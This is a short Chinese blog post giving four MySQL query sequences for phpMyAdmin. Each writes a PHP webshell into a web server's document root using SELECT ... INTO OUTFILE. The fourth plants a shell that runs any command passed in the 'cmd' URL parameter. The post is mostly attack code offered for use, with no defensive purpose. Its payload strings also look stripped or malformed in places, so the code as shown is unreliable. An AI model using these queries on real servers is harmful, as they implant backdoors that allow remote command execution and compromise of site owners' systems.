美文网首页Web安全
四种phpmyadmin导出木马的方法

四种phpmyadmin导出木马的方法

作者: 简书这个地方快倒闭了 | 来源:发表于2017-03-29 16:58 被阅读32次

    第一种:

    CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('');SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';DROP TABLE IF EXISTS `darkmoon`;

    以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段

    然后在darkmoon1的字段中插入一句话代码

    然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)

    最后就是删除darkmoon这个表。

    第二种:

    Create TABLE moon (darkmoon text NOT NULL);     Insert INTO moon (darkmoon) VALUES('');           select darkmoon from moon into outfile 'd:/wamp/www/exehack.php';            Drop TABLE IF EXISTS moon;

    第三种:

    select ''INTO OUTFILE 'd:/wamp/www/exehack.php'

    第四种:

    select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/wamp/www/exehack.php'

    这个可以直接执行cmd命令,参数为cmd

    相关文章

      网友评论

        本文标题:四种phpmyadmin导出木马的方法

        本文链接:https://www.haomeiwen.com/subject/mecyottx.html